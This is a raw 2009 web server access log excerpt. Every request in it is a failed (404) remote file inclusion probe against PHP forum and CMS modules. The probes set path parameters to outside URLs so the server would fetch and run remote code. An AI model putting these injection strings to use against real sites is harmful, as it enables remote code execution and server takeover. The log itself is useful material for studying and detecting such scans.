203.94.155.59 - - [20/Jun/2009:01:15:26 -0400] "GET /logs/access_log.Q109052300//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:01:15:28 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:01:15:28 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:01:15:28 -0400] "GET /logs/access_log.Q109052300//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:01:15:29 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:01:15:29 -0400] "GET /logs/access_log.Q109052300//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
203.94.155.59 - - [20/Jun/2009:01:15:29 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://impeel.com/impeel/wizard/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
200.105.207.244 - - [20/Jun/2009:01:16:17 -0400] "GET /logs/access_log.Q109052400%20%20//components/com_smf/smf.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
